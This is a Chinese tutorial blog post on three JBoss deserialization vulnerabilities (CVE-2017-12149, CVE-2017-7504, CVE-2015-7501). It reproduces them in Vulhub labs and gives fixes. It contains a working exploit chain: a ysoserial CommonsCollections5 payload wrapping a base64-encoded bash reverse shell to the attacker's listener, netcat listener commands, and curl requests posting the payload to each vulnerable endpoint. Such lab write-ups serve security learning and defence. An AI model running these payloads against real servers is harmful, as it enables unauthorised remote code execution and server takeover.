当前位置：首页 > article >正文

JBOSS反序列化漏洞解析与防范策略CVE-2017-12149

article 2026/1/20 12:34:36

JBOSS反序列化漏洞解析与防范策略

引言

JBOSS是一个流行的开源应用服务器，广泛应用于企业级应用程序的开发和部署。然而，由于其广泛的使用和复杂的架构，JBOSS也成为了黑客攻击的常见目标。近年来，多个JBOSS漏洞被曝光，这些漏洞允许攻击者远程执行任意代码、窃取数据或导致服务中断，对企业和用户的信息安全构成了严重威胁。因此，理解和防范JBOSS漏洞成为了网络安全领域的重要课题。

JBOSS反序列化漏洞是近年来网络安全领域中的一个热点问题。反序列化是将序列化数据还原为对象的过程，而在JBOSS中，由于对输入数据的反序列化处理不当，攻击者可以利用这一过程注入恶意代码，从而实现远程代码执行、数据泄露等攻击。这种漏洞的存在，不仅威胁到JBOSS服务器本身的安全，还可能影响到使用JBOSS的应用程序和其背后的整个企业系统。因此，深入理解JBOSS反序列化漏洞的原理及其防范策略，对于保障网络安全具有重要意义。

原理

JBOSS反序列化漏洞的原理主要涉及到Java序列化机制。在Java中，序列化是将对象转换为字节流的过程，以便于存储或传输。反序列化则是将字节流重新转换为对象的过程。当JBOSS服务器接收到来自客户端的序列化数据时，它会尝试将这些数据反序列化为对象。如果攻击者精心构造了这些序列化数据，使其在反序列化过程中执行恶意代码，那么就可以实现远程代码执行等攻击。

环境搭建

介绍

Vulhub，由资深安全专家打造的开源漏洞靶场环境，已成为网络安全研究和测试的得力助手。它基于Docker和Docker Compose，为安全研究人员提供了一个快速、便捷的方式来搭建、使用和分享各种漏洞环境。

Vulhub的创建旨在简化漏洞测试流程，提供一个标准的测试平台，让安全研究更加高效和系统化。通过Vulhub，研究人员可以快速部署漏洞场景，进行深入研究，而无需担心对实际生产环境的影响。

对于网络安全爱好者来说，学习如何搭建Vulhub是提升技能的必经之路。这不仅涉及Docker和Docker Compose的技术应用，也是理解漏洞测试基本流程的实践机会。

搭建步骤

环境准备

Ubuntu虚拟机（其他Linux虚拟机也可以）、docker、docker-compose

下载vulhub（记得Star）

下载地址：vulhub/vulhub：基于 Docker-Compose 的预构建脆弱环境 — vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose

上传至虚拟机

使用XFTP或者使用VMware提供的复制粘贴功能粘贴到虚拟机并解压，推荐放到桌面，方便管理

工具下载

下载地址：frohoff/ysosarial：一个概念验证工具，用于生成利用不安全 Java 对象私有化的有效负载。 — frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
java环境推荐1.8（亲测有效）

CVE-2017-12149

漏洞描述

CVE-2017-12149漏洞是一个反序列化远程代码执行漏洞，存在于JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。攻击者可以通过构造恶意序列化数据，在未经身份验证的情况下在服务器上执行任意代码，从而控制服务器

影响范围

该漏洞影响以下版本的JBoss应用服务器：

JBoss 5.x版本
JBoss 6.x版本

漏洞原理

JBoss应用服务器在处理来自客户端的序列化数据时，没有进行适当的安全检查和限制，导致攻击者可以利用精心设计的序列化数据执行任意代码。具体来说，漏洞出现在/invoker/readonly路径下，服务器将用户提交的POST内容进行了Java反序列化1247

环境搭建

进入靶场环境文件夹 cd Desktop/vulhub-master/jboss/CVE-2017-12149/
开启环境docker-compose up -d
使用docker ps查看正在运行的容器，可以看到端口号为8080
使用浏览器访问

攻击复现

使用浏览器访问192.168.35.128:8080/invoker/readonly，出现如下界面

监听端口

# linux下使用
nc -lvp 8888
# windows下可以使用nmap工具的监听端口功能
ncat -lvp 8888

进入到到工具目录
```
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM1LjEvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" >poc.ser
```
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM1LjEvODg4OCAwPiYx为计划任务反弹Shellbash -i >& /dev/tcp/192.168.35.1/8888 0>&1的base64加密值，将其中的IP地址（攻击机IP地址）和监听端口改为自己需要的，在进行base64加密，ysoserial-all.jar为自己的工具文件名
```
curl http://192.168.35.128:8080/invoker/readonly --data-binary @poc.ser
```
使用 curl 工具向指定的http://192.168.35.128:8080/invoker/readonly发送一个 POST 请求，其中包含了名为 poc.ser 的文件内容作为请求体。
成功反弹Shell

修复方案

针对CVE-2017-12149漏洞，修复方案包括：

升级JBoss版本：升级到不受影响的JBoss版本（例如，JBoss 7.x版本）。
删除不必要的组件：如果不需要http-invoker.sar组件，可以直接删除该组件。
添加安全控制：在http-invoker.sar下web.xml的security-constraint标签中添加访问控制，限制对http invoker组件的访问

CVE-2017-7504

漏洞描述

CVE-2017-7504漏洞存在于JBoss AS 4.x及之前版本的JbossMQ组件中。具体来说，漏洞位于HTTPServerILServlet.java文件，该文件在处理反序列化数据时没有进行适当的安全检查，导致攻击者可以借助特制的序列化数据执行任意代码

影响范围

该漏洞影响JBoss AS 4.x及之前版本

环境搭建

使用vulhub靶场，搭建教程vulhub搭建教程

进入靶场环境文件夹 cd Desktop/vulhub-master/jboss/CVE-2017-7504/
开启环境docker-compose up -d
使用docker ps查看正在运行的容器，可以看到端口号为8080
使用浏览器访问

攻击复现

使用浏览器访问192.168.35.128:8080/jbossmq-httpil/HTTPServerILServlet，出现如下界面

其他步骤与CVE-2017-12149相同，只有最后请求的网址变了

curl http://192.168.35.128:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @poc.ser

修复建议

升级版本：升级到不受该漏洞影响的JBoss版本。
禁用相关服务：如果不需要JBossMQ服务，可以禁用该服务以避免漏洞利用。
修改配置：在服务器配置中限制对敏感路径的访问，例如修改jboss-web.deployer/server.xml中的绑定地址

JMXInvokerServlet-deserialization（CVE-2015-7501）

漏洞描述

JBoss在处理 /invoker/JMXInvokerServlet 请求时，会读取用户传入的对象并进行反序列化。攻击者可以利用Apache Commons Collections中的Gadget来执行任意代码

影响范围

该漏洞影响以下版本的JBoss产品：

JBoss Enterprise Application Platform 6.4.4, 5.2.0, 4.3.0 CP10
JBoss AS (Wildly) 6及之前版本
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1, 3.0

环境搭建

使用vulhub靶场，搭建教程vulhub搭建教程

进入靶场环境文件夹 cd Desktop/vulhub-master/jboss/JMXInvokerServlet-deserialization/
开启环境docker-compose up -d
使用docker ps查看正在运行的容器，可以看到端口号为8080
使用浏览器访问

攻击复现

使用浏览器访问192.168.35.128:8080/invoker/JMXInvokerServlet，下载了文件，说明漏洞存在

其他步骤与CVE-2017-12149相同，只有最后请求的网址变了

curl http://192.168.35.128:8080/invoker/JMXInvokerServlet --data-binary @poc.ser

修复建议

更新版本：升级到不受该漏洞影响的JBoss版本。
禁用相关服务：如果不需要JBossMQ服务，可以禁用该服务以避免漏洞利用。
修改配置：在服务器配置中限制对敏感路径的访问。例如，修改 jboss-web.deployer/server.xml 中的绑定地址。
使用安全库：更新Apache Commons Collections库，并使用SerialKiller来控制反序列化的可信类型

参考文章：

JBoss反序列化漏洞复现_cve-2017-7504-CSDN博客